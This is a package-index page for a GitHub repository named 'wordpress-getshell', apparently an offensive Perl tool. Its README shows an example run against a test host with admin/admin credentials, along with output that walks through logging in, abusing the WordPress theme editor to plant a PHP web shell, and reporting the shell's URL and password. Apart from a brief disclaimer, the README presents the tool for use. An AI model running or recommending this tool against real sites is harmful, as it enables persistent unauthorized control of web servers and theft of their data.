https://github.com/caledoniaproject/wordpress-getshell

Last synced: 2 months ago
JSON representation

Host: GitHub
URL: https://github.com/caledoniaproject/wordpress-getshell
Owner: CaledoniaProject
Created: 2015-05-18T11:45:37.000Z (about 11 years ago)
Default Branch: master
Last Pushed: 2015-05-18T11:51:40.000Z (about 11 years ago)
Last Synced: 2025-12-27T03:53:25.356Z (6 months ago)
Language: Perl
Size: 117 KB
Stars: 2
Watchers: 1
Forks: 3
Open Issues: 0
Metadata Files:
- Readme: README.md

Awesome Lists containing this project

README

          # Wordpress GetShell - Public Edition

With a valid combination of username and password, the scripts below demostrates how to plant a PHP shell automatically

# Example usage

```

%> perl wp-getshell.pl http://ubuntu64/wordpress admin admin

[+] Logged in, replacing cookies

[+] Now looking for editor

[+] Editor found, old content length 48

[+] Building forms

    --> _wpnonce with value 09f8f3fb95

    --> file with value 404.php

    --> _wp_http_referer with value /wordpress/wp-admin/theme-editor.php?file=404.php

    --> scrollto with value 0

    --> theme with value twentyfourteen

    --> action with value update

[+] Saving files

[+] Accessing previously saved file

[+] Restoring contents of 404.php

[+] Checking if shell is in place

[+] PHP shell ready

    URL:  http://ubuntu64/wordpress/123.php

    Pass: xxx

```

# Legal disclaimer

Using this tool is legit but hacking may not be. The author does not take any responsibility for such activities.

ecosyste.ms

Data

Tools

Indexes

Applications

Experiments

Awesome

https://github.com/caledoniaproject/wordpress-getshell

Awesome Lists containing this project

README